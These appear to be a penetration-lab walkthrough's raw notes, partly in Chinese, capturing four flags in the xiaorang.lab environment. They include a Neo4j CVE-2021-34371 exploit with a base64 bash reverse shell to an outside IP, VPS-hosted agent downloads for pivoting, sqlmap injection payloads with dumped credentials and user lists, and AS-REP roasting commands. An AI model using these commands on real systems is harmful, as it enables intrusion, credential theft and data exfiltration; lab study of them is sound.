time
flag01
39.98.107.186
cd "/mnt/d/软件工具/渗透/tools/tools/fscan_all_version/fscan_all_version"
q1n9@LAPTOP-3H92FD9J:/mnt/d/软件工具/渗透/tools/tools/fscan_all_version/fscan_all_version$ ./fscan -h 39.98.107.186 -p 1-65535
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.98.107.186:22 open
39.98.107.186:1337 open
39.98.107.186:7474 open
39.98.107.186:7473 open
39.98.107.186:7687 open
39.98.107.186:41409 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle http://39.98.107.186:7474 code:303 len:0 title:None 跳转url: http://39.98.107.186:7474/browser/
[*] WebTitle http://39.98.107.186:7474/browser/ code:200 len:3279 title:Neo4j Browser
[*] WebTitle https://39.98.107.186:7473 code:303 len:0 title:None 跳转url: https://39.98.107.186:7473/browser/
[*] WebTitle https://39.98.107.186:7687 code:400 len:50 title:None
[*] WebTitle https://39.98.107.186:7473/browser/ code:200 len:3279 title:Neo4j Browser
已完成 6/6
[*] 扫描结束,耗时: 2m52.002536904s
CVE-2021-34371 Neo4j-Shell 漏洞复现 - 凪白Kw - 博客园
bash -i >& /dev/tcp/139.129.20.156/7777 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTI5LjIwLjE1Ni83Nzc3IDA+JjE=
java -jar .\rhino_gadget.jar rmi://39.99.150.67:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTI5LjIwLjE1Ni83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"
D:\软件工具\渗透\tools\马\CVE-2021-34371.jar-main>java -jar .\rhino_gadget.jar rmi://39.99.150.67:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMzkuMTI5LjIwLjE1Ni83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"
Trying to enumerate server bindings:
Found binding: shell
[+] Found valid binding, proceeding to exploit
[+] Caught an unmarshalled exception, this is expected.
RemoteException occurred in server thread; nested exception is:
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
java.io.IOException
[+] Exploit completed
flag01: flag{71d59e48-f05f-43d4-8d98-3917d37ff490}
flag02
在VPS上起个python内置服务器:
把需要下载的文件放在你执行python命令的路径下,然后执行下面的命令python3 -m http.server 80
然后在对方机器shell中进行下载,输入下面的命令即可,这里的ip为我们的vps的外网地址,路径为文件名wget http://139.129.20.156/linux_x64_agent
cd "/mnt/d/软件工具/渗透/tools/tools/Stotaway-bin/Stotaway-bin"
./linux_x64_admin -c 39.99.150.67:11111 -s 123
./linux_x64_agent -l 11111 -s 123
./linux_x64_agent -l 11112 -s 123
./windows_x64_admin.exe -c 39.98.107.186:11112 -s 123upload /home/q1n9/fscan /tmp/1/fscan
neo4j@ubuntu:/tmp/1$ ip addr
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:02:f4:52 brd ff:ff:ff:ff:ff:ff
inet 172.22.6.36/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 1892154314sec preferred_lft 1892154314sec
inet6 fe80::216:3eff:fe02:f452/64 scope link
valid_lft forever preferred_lft forever chmod +x ./fscan
./fscan -h 172.22.6.0/24
download /tmp/1/result.txt /home/q1n9/result.txt
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.36:7687 open
172.22.6.12:445 open
172.22.6.25:445 open
172.22.6.12:88 open
172.22.6.12:139 open
172.22.6.25:139 open
172.22.6.12:135 open
172.22.6.25:135 open
172.22.6.38:80 open
[*] WebTitle http://172.22.6.38 code:200 len:1531 title:后台登录
[*] NetInfo
[*]172.22.6.25
[->]WIN2019
[->]172.22.6.25
[*] NetInfo
[*]172.22.6.12
[->]DC-PROGAME
[->]172.22.6.12
[*] NetBios 172.22.6.25 XIAORANG\WIN2019
[*] OsInfo 172.22.6.12 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.6.12 [+] DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
#角色:域控制器(DC:DC-PROGAME.xiaorang.lab),域名为 xiaorang.lab。
[*] WebTitle https://172.22.6.36:7687 code:400 len:50 title:None
可以看到,172.22.6.25是域内成员, 172.22.6.12是域控
打开http://172.22.6.38/index.php发现是个登陆
POST /index.php HTTP/1.1
Host: 172.22.6.38
Content-Length: 27
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
username=admin&password=123于是直接sqlmap
┌──(q1n9㉿LAPTOP-3H92FD9J)-[~]
└─$ proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
___
__H__
___ ___["]_____ ___ ___ {1.9.6#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:56:37 /2025-08-08/
[21:56:37] [INFO] resuming back-end DBMS 'mysql'
[21:56:37] [INFO] testing connection to the target URL
[proxychains] Strict chain ... 127.0.0.1:12345 ... 172.22.6.38:80 [proxychains] Strict chain ... 127.0.0.1:12345 ... 172.22.6.38:80 ... OK
... OK
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 6533 FROM (SELECT(SLEEP(5)))kbVs) AND 'dqCy'='dqCy&password=123
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x716a707671,0x74734f4e524b445a59774e68514f6b6a705159546a42734a446854626c516452704c7a79704e4d42,0x7162717a71),NULL-- -&password=123
---
[21:56:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[21:56:37] [INFO] fetched data logged to text files under '/home/q1n9/.local/share/sqlmap/output/172.22.6.38'
[*] ending @ 21:56:37 /2025-08-08/
proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123" --dbs
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys
proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123" -D 数据库名 -T 表名 --dump
proxychains4 sqlmap -u "http://172.22.6.38/index.php" --data "username=admin&password=123" -D oa_db --dump
[1 entry]
+----+--------------------------------------------+
| id | flag02 |
+----+--------------------------------------------+
| 1 | flag{b142f5ce-d9b8-4b73-9012-ad75175ba029} |
+----+--------------------------------------------+
[21:58:47] [INFO] table 'oa_db.oa_f1Agggg' dumped to CSV file '/home/q1n9/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_f1Agggg.csv'
[21:58:47] [INFO] fetching columns for table 'oa_admin' in database 'oa_db'
[proxychains] Strict chain ... 127.0.0.1:12345 ... 172.22.6.38:80 ... OK
... OK
[21:58:47] [INFO] fetching entries for table 'oa_admin' in database 'oa_db'
[proxychains] Strict chain ... 127.0.0.1:12345 ... 172.22.6.38:80 Database: oa_db
Table: oa_admin
[1 entry]
+----+------------------+---------------+
| id | password | username |
+----+------------------+---------------+
| 1 | bo2y8kAL3HnXUiQo | administrator |
+----+------------------+---------------+
[21:58:47] [INFO] table 'oa_db.oa_admin' dumped to CSV file '/home/q1n9/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_admin.csv'
[21:58:47] [INFO] fetching columns for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain ... 127.0.0.1:12345 ... 172.22.6.38:80 ... OK
... OK
[21:58:47] [INFO] fetching entries for table 'oa_users' in database 'oa_db'
[proxychains] Strict chain ... 127.0.0.1:12345 ... 172.22.6.38:80 ... OK
Database: oa_db
Table: oa_users
[500 entries]
+-----+----------------------------+-------------+-----------------+
| id | email | phone | username |
+-----+----------------------------+-------------+-----------------+
[21:58:48] [WARNING] console output will be trimmed to last 256 rows due to large table size
| 245 | chenyan@xiaorang.lab | 18281528743 | CHEN YAN |
| 246 | tanggui@xiaorang.lab | 18060615547 | TANG GUI |
| 247 | buning@xiaorang.lab | 13046481392 | BU NING |
| 248 | beishu@xiaorang.lab | 18268508400 | BEI SHU |
| 249 | shushi@xiaorang.lab | 17770383196 | SHU SHI |
| 250 | fuyi@xiaorang.lab | 18902082658 | FU YI |
| 251 | pangcheng@xiaorang.lab | 18823789530 | PANG CHENG |
| 252 | tonghao@xiaorang.lab | 13370873526 | TONG HAO |
| 253 | jiaoshan@xiaorang.lab | 15375905173 | JIAO SHAN |
| 254 | dulun@xiaorang.lab | 13352331157 | DU LUN |
| 255 | kejuan@xiaorang.lab | 13222550481 | KE JUAN |
| 256 | gexin@xiaorang.lab | 18181553086 | GE XIN |
| 257 | lugu@xiaorang.lab | 18793883130 | LU GU |
| 258 | guzaicheng@xiaorang.lab | 15309377043 | GU ZAI CHENG |
| 259 | feicai@xiaorang.lab | 13077435367 | FEI CAI |
| 260 | ranqun@xiaorang.lab | 18239164662 | RAN QUN |
| 261 | zhouyi@xiaorang.lab | 13169264671 | ZHOU YI |
| 262 | shishu@xiaorang.lab | 18592890189 | SHI SHU |
| 263 | yanyun@xiaorang.lab | 15071085768 | YAN YUN |
| 264 | chengqiu@xiaorang.lab | 13370162980 | CHENG QIU |
| 265 | louyou@xiaorang.lab | 13593582379 | LOU YOU |
| 266 | maqun@xiaorang.lab | 15235945624 | MA QUN |
| 267 | wenbiao@xiaorang.lab | 13620643639 | WEN BIAO |
| 268 | weishengshan@xiaorang.lab | 18670502260 | WEI SHENG SHAN |
| 269 | zhangxin@xiaorang.lab | 15763185760 | ZHANG XIN |
| 270 | chuyuan@xiaorang.lab | 18420545268 | CHU YUAN |
| 271 | wenliang@xiaorang.lab | 13601678032 | WEN LIANG |
| 272 | yulvxue@xiaorang.lab | 18304374901 | YU LV XUE |
| 273 | luyue@xiaorang.lab | 18299785575 | LU YUE |
| 274 | ganjian@xiaorang.lab | 18906111021 | GAN JIAN |
| 275 | pangzhen@xiaorang.lab | 13479328562 | PANG ZHEN |
| 276 | guohong@xiaorang.lab | 18510220597 | GUO HONG |
| 277 | lezhong@xiaorang.lab | 15320909285 | LE ZHONG |
| 278 | sheweiyue@xiaorang.lab | 13736399596 | SHE WEI YUE |
| 279 | dujian@xiaorang.lab | 15058892639 | DU JIAN |
| 280 | lidongjin@xiaorang.lab | 18447207007 | LI DONG JIN |
| 281 | hongqun@xiaorang.lab | 15858462251 | HONG QUN |
| 282 | yexing@xiaorang.lab | 13719043564 | YE XING |
| 283 | maoda@xiaorang.lab | 13878840690 | MAO DA |
| 284 | qiaomei@xiaorang.lab | 13053207462 | QIAO MEI |
| 285 | nongzhen@xiaorang.lab | 15227699960 | NONG ZHEN |
| 286 | dongshu@xiaorang.lab | 15695562947 | DONG SHU |
| 287 | zhuzhu@xiaorang.lab | 13070163385 | ZHU ZHU |
| 288 | jiyun@xiaorang.lab | 13987332999 | JI YUN |
| 289 | qiguanrou@xiaorang.lab | 15605983582 | QI GUAN ROU |
| 290 | yixue@xiaorang.lab | 18451603140 | YI XUE |
| 291 | chujun@xiaorang.lab | 15854942459 | CHU JUN |
| 292 | shenshan@xiaorang.lab | 17712052191 | SHEN SHAN |
| 293 | lefen@xiaorang.lab | 13271196544 | LE FEN |
| 294 | yubo@xiaorang.lab | 13462202742 | YU BO |
| 295 | helianrui@xiaorang.lab | 15383000907 | HE LIAN RUI |
| 296 | xuanqun@xiaorang.lab | 18843916267 | XUAN QUN |
| 297 | shangjun@xiaorang.lab | 15162486698 | SHANG JUN |
| 298 | huguang@xiaorang.lab | 18100586324 | HU GUANG |
| 299 | wansifu@xiaorang.lab | 18494761349 | WAN SI FU |
| 300 | fenghong@xiaorang.lab | 13536727314 | FENG HONG |
| 301 | wanyan@xiaorang.lab | 17890844429 | WAN YAN |
| 302 | diyan@xiaorang.lab | 18534028047 | DI YAN |
| 303 | xiangyu@xiaorang.lab | 13834043047 | XIANG YU |
| 304 | songyan@xiaorang.lab | 15282433280 | SONG YAN |
| 305 | fandi@xiaorang.lab | 15846960039 | FAN DI |
| 306 | xiangjuan@xiaorang.lab | 18120327434 | XIANG JUAN |
| 307 | beirui@xiaorang.lab | 18908661803 | BEI RUI |
| 308 | didi@xiaorang.lab | 13413041463 | DI DI |
| 309 | zhubin@xiaorang.lab | 15909558554 | ZHU BIN |
| 310 | lingchun@xiaorang.lab | 13022790678 | LING CHUN |
| 311 | zhenglu@xiaorang.lab | 13248244873 | ZHENG LU |
| 312 | xundi@xiaorang.lab | 18358493414 | XUN DI |
| 313 | wansishun@xiaorang.lab | 18985028319 | WAN SI SHUN |
| 314 | yezongyue@xiaorang.lab | 13866302416 | YE ZONG YUE |
| 315 | bianmei@xiaorang.lab | 18540879992 | BIAN MEI |
| 316 | shanshao@xiaorang.lab | 18791488918 | SHAN SHAO |
| 317 | zhenhui@xiaorang.lab | 13736784817 | ZHEN HUI |
| 318 | chengli@xiaorang.lab | 15913267394 | CHENG LI |
| 319 | yufen@xiaorang.lab | 18432795588 | YU FEN |
| 320 | jiyi@xiaorang.lab | 13574211454 | JI YI |
| 321 | panbao@xiaorang.lab | 13675851303 | PAN BAO |
| 322 | mennane@xiaorang.lab | 15629706208 | MEN NAN E |
| 323 | fengsi@xiaorang.lab | 13333432577 | FENG SI |
| 324 | mingyan@xiaorang.lab | 18296909463 | MING YAN |
| 325 | luoyou@xiaorang.lab | 15759321415 | LUO YOU |
| 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING |
| 327 | nongyan@xiaorang.lab | 18097386975 | NONG YAN |
| 328 | haolun@xiaorang.lab | 15152700465 | HAO LUN |
| 329 | oulun@xiaorang.lab | 13402760696 | OU LUN |
| 330 | weichipeng@xiaorang.lab | 18057058937 | WEI CHI PENG |
| 331 | qidiaofang@xiaorang.lab | 18728297829 | QI DIAO FANG |
| 332 | xuehe@xiaorang.lab | 13398862169 | XUE HE |
| 333 | chensi@xiaorang.lab | 18030178713 | CHEN SI |
| 334 | guihui@xiaorang.lab | 17882514129 | GUI HUI |
| 335 | fuyue@xiaorang.lab | 18298436549 | FU YUE |
| 336 | wangxing@xiaorang.lab | 17763645267 | WANG XING |
| 337 | zhengxiao@xiaorang.lab | 18673968392 | ZHENG XIAO |
| 338 | guhui@xiaorang.lab | 15166711352 | GU HUI |
| 339 | baoai@xiaorang.lab | 15837430827 | BAO AI |
| 340 | hangzhao@xiaorang.lab | 13235488232 | HANG ZHAO |
| 341 | xingye@xiaorang.lab | 13367587521 | XING YE |
| 342 | qianyi@xiaorang.lab | 18657807767 | QIAN YI |
| 343 | xionghong@xiaorang.lab | 17725874584 | XIONG HONG |
| 344 | zouqi@xiaorang.lab | 15300430128 | ZOU QI |
| 345 | rongbiao@xiaorang.lab | 13034242682 | RONG BIAO |
| 346 | gongxin@xiaorang.lab | 15595839880 | GONG XIN |
| 347 | luxing@xiaorang.lab | 18318675030 | LU XING |
| 348 | huayan@xiaorang.lab | 13011805354 | HUA YAN |
| 349 | duyue@xiaorang.lab | 15515878208 | DU YUE |
| 350 | xijun@xiaorang.lab | 17871583183 | XI JUN |
| 351 | daiqing@xiaorang.lab | 18033226216 | DAI QING |
| 352 | yingbiao@xiaorang.lab | 18633421863 | YING BIAO |
| 353 | hengteng@xiaorang.lab | 15956780740 | HENG TENG |
| 354 | changwu@xiaorang.lab | 15251485251 | CHANG WU |
| 355 | chengying@xiaorang.lab | 18788248715 | CHENG YING |
| 356 | luhong@xiaorang.lab | 17766091079 | LU HONG |
| 357 | tongxue@xiaorang.lab | 18466102780 | TONG XUE |
| 358 | xiangqian@xiaorang.lab | 13279611385 | XIANG QIAN |
| 359 | shaokang@xiaorang.lab | 18042645434 | SHAO KANG |
| 360 | nongzhu@xiaorang.lab | 13934236634 | NONG ZHU |
| 361 | haomei@xiaorang.lab | 13406913218 | HAO MEI |
| 362 | maoqing@xiaorang.lab | 15713298425 | MAO QING |
| 363 | xiai@xiaorang.lab | 18148404789 | XI AI |
| 364 | bihe@xiaorang.lab | 13628593791 | BI HE |
| 365 | gaoli@xiaorang.lab | 15814408188 | GAO LI |
| 366 | jianggong@xiaorang.lab | 15951118926 | JIANG GONG |
| 367 | pangning@xiaorang.lab | 13443921700 | PANG NING |
| 368 | ruishi@xiaorang.lab | 15803112819 | RUI SHI |
| 369 | wuhuan@xiaorang.lab | 13646953078 | WU HUAN |
| 370 | qiaode@xiaorang.lab | 13543564200 | QIAO DE |
| 371 | mayong@xiaorang.lab | 15622971484 | MA YONG |
| 372 | hangda@xiaorang.lab | 15937701659 | HANG DA |
| 373 | changlu@xiaorang.lab | 13734991654 | CHANG LU |
| 374 | liuyuan@xiaorang.lab | 15862054540 | LIU YUAN |
| 375 | chenggu@xiaorang.lab | 15706685526 | CHENG GU |
| 376 | shentuyun@xiaorang.lab | 15816902379 | SHEN TU YUN |
| 377 | zhuangsong@xiaorang.lab | 17810274262 | ZHUANG SONG |
| 378 | chushao@xiaorang.lab | 18822001640 | CHU SHAO |
| 379 | heli@xiaorang.lab | 13701347081 | HE LI |
| 380 | haoming@xiaorang.lab | 15049615282 | HAO MING |
| 381 | xieyi@xiaorang.lab | 17840660107 | XIE YI |
| 382 | shangjie@xiaorang.lab | 15025010410 | SHANG JIE |
| 383 | situxin@xiaorang.lab | 18999728941 | SI TU XIN |
| 384 | linxi@xiaorang.lab | 18052976097 | LIN XI |
| 385 | zoufu@xiaorang.lab | 15264535633 | ZOU FU |
| 386 | qianqing@xiaorang.lab | 18668594658 | QIAN QING |
| 387 | qiai@xiaorang.lab | 18154690198 | QI AI |
| 388 | ruilin@xiaorang.lab | 13654483014 | RUI LIN |
| 389 | luomeng@xiaorang.lab | 15867095032 | LUO MENG |
| 390 | huaren@xiaorang.lab | 13307653720 | HUA REN |
| 391 | yanyangmei@xiaorang.lab | 15514015453 | YAN YANG MEI |
| 392 | zuofen@xiaorang.lab | 15937087078 | ZUO FEN |
| 393 | manyuan@xiaorang.lab | 18316106061 | MAN YUAN |
| 394 | yuhui@xiaorang.lab | 18058257228 | YU HUI |
| 395 | sunli@xiaorang.lab | 18233801124 | SUN LI |
| 396 | guansixin@xiaorang.lab | 13607387740 | GUAN SI XIN |
| 397 | ruisong@xiaorang.lab | 13306021674 | RUI SONG |
| 398 | qiruo@xiaorang.lab | 13257810331 | QI RUO |
| 399 | jinyu@xiaorang.lab | 18565922652 | JIN YU |
| 400 | shoujuan@xiaorang.lab | 18512174415 | SHOU JUAN |
| 401 | yanqian@xiaorang.lab | 13799789435 | YAN QIAN |
| 402 | changyun@xiaorang.lab | 18925015029 | CHANG YUN |
| 403 | hualu@xiaorang.lab | 13641470801 | HUA LU |
| 404 | huanming@xiaorang.lab | 15903282860 | HUAN MING |
| 405 | baoshao@xiaorang.lab | 13795275611 | BAO SHAO |
| 406 | hongmei@xiaorang.lab | 13243605925 | HONG MEI |
| 407 | manyun@xiaorang.lab | 13238107359 | MAN YUN |
| 408 | changwan@xiaorang.lab | 13642205622 | CHANG WAN |
| 409 | wangyan@xiaorang.lab | 13242486231 | WANG YAN |
| 410 | shijian@xiaorang.lab | 15515077573 | SHI JIAN |
| 411 | ruibei@xiaorang.lab | 18157706586 | RUI BEI |
| 412 | jingshao@xiaorang.lab | 18858376544 | JING SHAO |
| 413 | jinzhi@xiaorang.lab | 18902437082 | JIN ZHI |
| 414 | yuhui@xiaorang.lab | 15215599294 | YU HUI |
| 415 | zangpeng@xiaorang.lab | 18567574150 | ZANG PENG |
| 416 | changyun@xiaorang.lab | 15804640736 | CHANG YUN |
| 417 | yetai@xiaorang.lab | 13400150018 | YE TAI |
| 418 | luoxue@xiaorang.lab | 18962643265 | LUO XUE |
| 419 | moqian@xiaorang.lab | 18042706956 | MO QIAN |
| 420 | xupeng@xiaorang.lab | 15881934759 | XU PENG |
| 421 | ruanyong@xiaorang.lab | 15049703903 | RUAN YONG |
| 422 | guliangxian@xiaorang.lab | 18674282714 | GU LIANG XIAN |
| 423 | yinbin@xiaorang.lab | 15734030492 | YIN BIN |
| 424 | huarui@xiaorang.lab | 17699257041 | HUA RUI |
| 425 | niuya@xiaorang.lab | 13915041589 | NIU YA |
| 426 | guwei@xiaorang.lab | 13584571917 | GU WEI |
| 427 | qinguan@xiaorang.lab | 18427953434 | QIN GUAN |
| 428 | yangdanhan@xiaorang.lab | 15215900100 | YANG DAN HAN |
| 429 | yingjun@xiaorang.lab | 13383367818 | YING JUN |
| 430 | weiwan@xiaorang.lab | 13132069353 | WEI WAN |
| 431 | sunduangu@xiaorang.lab | 15737981701 | SUN DUAN GU |
| 432 | sisiwu@xiaorang.lab | 18021600640 | SI SI WU |
| 433 | nongyan@xiaorang.lab | 13312613990 | NONG YAN |
| 434 | xuanlu@xiaorang.lab | 13005748230 | XUAN LU |
| 435 | yunzhong@xiaorang.lab | 15326746780 | YUN ZHONG |
| 436 | gengfei@xiaorang.lab | 13905027813 | GENG FEI |
| 437 | zizhuansong@xiaorang.lab | 13159301262 | ZI ZHUAN SONG |
| 438 | ganbailong@xiaorang.lab | 18353612904 | GAN BAI LONG |
| 439 | shenjiao@xiaorang.lab | 15164719751 | SHEN JIAO |
| 440 | zangyao@xiaorang.lab | 18707028470 | ZANG YAO |
| 441 | yangdanhe@xiaorang.lab | 18684281105 | YANG DAN HE |
| 442 | chengliang@xiaorang.lab | 13314617161 | CHENG LIANG |
| 443 | xudi@xiaorang.lab | 18498838233 | XU DI |
| 444 | wulun@xiaorang.lab | 18350490780 | WU LUN |
| 445 | yuling@xiaorang.lab | 18835870616 | YU LING |
| 446 | taoya@xiaorang.lab | 18494928860 | TAO YA |
| 447 | jinle@xiaorang.lab | 15329208123 | JIN LE |
| 448 | youchao@xiaorang.lab | 13332964189 | YOU CHAO |
| 449 | liangduanzhi@xiaorang.lab | 15675237494 | LIANG DUAN ZHI |
| 450 | jiagupiao@xiaorang.lab | 17884962455 | JIA GU PIAO |
| 451 | ganze@xiaorang.lab | 17753508925 | GAN ZE |
| 452 | jiangqing@xiaorang.lab | 15802357200 | JIANG QING |
| 453 | jinshan@xiaorang.lab | 13831466303 | JIN SHAN |
| 454 | zhengpubei@xiaorang.lab | 13690156563 | ZHENG PU BEI |
| 455 | cuicheng@xiaorang.lab | 17641589842 | CUI CHENG |
| 456 | qiyong@xiaorang.lab | 13485427829 | QI YONG |
| 457 | qizhu@xiaorang.lab | 18838859844 | QI ZHU |
| 458 | ganjian@xiaorang.lab | 18092585003 | GAN JIAN |
| 459 | yurui@xiaorang.lab | 15764121637 | YU RUI |
| 460 | feishu@xiaorang.lab | 18471512248 | FEI SHU |
| 461 | chenxin@xiaorang.lab | 13906545512 | CHEN XIN |
| 462 | shengzhe@xiaorang.lab | 18936457394 | SHENG ZHE |
| 463 | wohong@xiaorang.lab | 18404022650 | WO HONG |
| 464 | manzhi@xiaorang.lab | 15973350408 | MAN ZHI |
| 465 | xiangdong@xiaorang.lab | 13233908989 | XIANG DONG |
| 466 | weihui@xiaorang.lab | 15035834945 | WEI HUI |
| 467 | xingquan@xiaorang.lab | 18304752969 | XING QUAN |
| 468 | miaoshu@xiaorang.lab | 15121570939 | MIAO SHU |
| 469 | gongwan@xiaorang.lab | 18233990398 | GONG WAN |
| 470 | qijie@xiaorang.lab | 15631483536 | QI JIE |
| 471 | shaoting@xiaorang.lab | 15971628914 | SHAO TING |
| 472 | xiqi@xiaorang.lab | 18938747522 | XI QI |
| 473 | jinghong@xiaorang.lab | 18168293686 | JING HONG |
| 474 | qianyou@xiaorang.lab | 18841322688 | QIAN YOU |
| 475 | chuhua@xiaorang.lab | 15819380754 | CHU HUA |
| 476 | yanyue@xiaorang.lab | 18702474361 | YAN YUE |
| 477 | huangjia@xiaorang.lab | 13006878166 | HUANG JIA |
| 478 | zhouchun@xiaorang.lab | 13545820679 | ZHOU CHUN |
| 479 | jiyu@xiaorang.lab | 18650881187 | JI YU |
| 480 | wendong@xiaorang.lab | 17815264093 | WEN DONG |
| 481 | heyuan@xiaorang.lab | 18710821773 | HE YUAN |
| 482 | mazhen@xiaorang.lab | 18698248638 | MA ZHEN |
| 483 | shouchun@xiaorang.lab | 15241369178 | SHOU CHUN |
| 484 | liuzhe@xiaorang.lab | 18530936084 | LIU ZHE |
| 485 | fengbo@xiaorang.lab | 15812110254 | FENG BO |
| 486 | taigongyuan@xiaorang.lab | 15943349034 | TAI GONG YUAN |
| 487 | gesheng@xiaorang.lab | 18278508909 | GE SHENG |
| 488 | songming@xiaorang.lab | 13220512663 | SONG MING |
| 489 | yuwan@xiaorang.lab | 15505678035 | YU WAN |
| 490 | diaowei@xiaorang.lab | 13052582975 | DIAO WEI |
| 491 | youyi@xiaorang.lab | 18036808394 | YOU YI |
| 492 | rongxianyu@xiaorang.lab | 18839918955 | RONG XIAN YU |
| 493 | fuyi@xiaorang.lab | 15632151678 | FU YI |
| 494 | linli@xiaorang.lab | 17883399275 | LIN LI |
| 495 | weixue@xiaorang.lab | 18672465853 | WEI XUE |
| 496 | hejuan@xiaorang.lab | 13256081102 | HE JUAN |
| 497 | zuoqiutai@xiaorang.lab | 18093001354 | ZUO QIU TAI |
| 498 | siyi@xiaorang.lab | 17873307773 | SI YI |
| 499 | shenshan@xiaorang.lab | 18397560369 | SHEN SHAN |
| 500 | tongdong@xiaorang.lab | 15177549595 | TONG DONG |
+-----+----------------------------+-------------+-----------------+
[21:58:48] [INFO] table 'oa_db.oa_users' dumped to CSV file '/home/q1n9/.local/share/sqlmap/output/172.22.6.38/dump/oa_db/oa_users.csv'
[21:58:48] [INFO] fetched data logged to text files under '/home/q1n9/.local/share/sqlmap/output/172.22.6.38'
[*] ending @ 21:58:48 /2025-08-08/
flag03&04
用脚本提取出username
# 读取包含表格数据的文件(假设数据保存在当前目录的 data.txt 中)
with open("data.txt", "r", encoding="utf-8") as f:
lines = f.readlines()
# 提取 username 并写入文件
with open("username.txt", "w", encoding="utf-8") as out:
for line in lines:
# 跳过表头和空行
if "username" in line or not line.strip():
continue
# 按竖线分割并提取第5列(索引4)的内容
parts = line.split("|")
if len(parts) >= 4:
username = parts[4].strip()
if username: # 确保内容非空
out.write(username + "\n")从运行结果来看,
impacket-GetNPUsers工具尝试对username.txt中的用户进行 AS-REP Roasting 攻击时,所有用户均返回KDC_ERR_C_PRINCIPAL_UNKNOWN错误,说明目标域(xiaorang.lab)的 KDC 数据库中不存在这些用户,具体原因和解决方向如下:核心原因分析
- 用户列表与目标域不匹配
username.txt中的用户(如CHEN YAN、TANG GUI等)可能属于其他域或本地用户,而非xiaorang.lab域的域用户,因此 KDC 无法识别。- 用户名格式错误
域用户通常需要严格的格式(如username而非USER NAME,不含空格),而列表中存在带空格的用户名(如CHEN YAN),可能与 KDC 中存储的实际用户名(如chenyan或chen.yan)不匹配。- 用户未启用 Kerberos 预认证
即使用户存在,若未禁用 Kerberos 预认证,GetNPUsers也无法获取 AS-REP 响应,但此情况不会返回 “用户不存在” 错误,因此可排除。解决建议
修正用户名格式
- 移除用户名中的空格(如
CHEN YAN→chenyan,与之前的chenyan@xiaorang.lab)。- 统一转为小写(域用户名通常不区分大小写,但建议与邮箱前缀保持一致)。
可通过脚本批量处理
username.txt:# 移除空格并转为小写 sed -i 's/ //g' username.txt tr '[:upper:]' '[:lower:]' < username.txt > username_fixed.txt确认用户是否为域用户
从之前的chenyan@xiaorang.lab)可知,域用户的邮箱前缀可能是真实用户名,建议直接使用邮箱前缀作为用户名列表(而非username列的显示名称)。提取邮箱前缀生成新用户列表:
# 假设原始数据文件为 data.txt,提取 email 列的前缀 grep -oP '[a-zA-Z0-9]+(?=@xiaorang.lab)' data.txt > valid_usernames.txt重新运行工具
使用修正后的用户列表:proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile valid_usernames.txt xiaorang.lab/
proxychains4 impacket-GetNPUsers -dc-ip 172.22.6.12 -usersfile username.txt xiaorang.lab/
